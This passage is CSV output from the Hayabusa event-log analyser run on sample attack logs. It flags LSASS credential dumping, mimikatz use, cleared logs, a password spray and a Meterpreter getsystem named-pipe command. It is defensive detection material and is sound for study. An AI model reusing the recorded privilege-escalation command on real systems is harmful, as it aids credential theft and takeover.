Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 
+09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 
+09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 
+09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:17.922 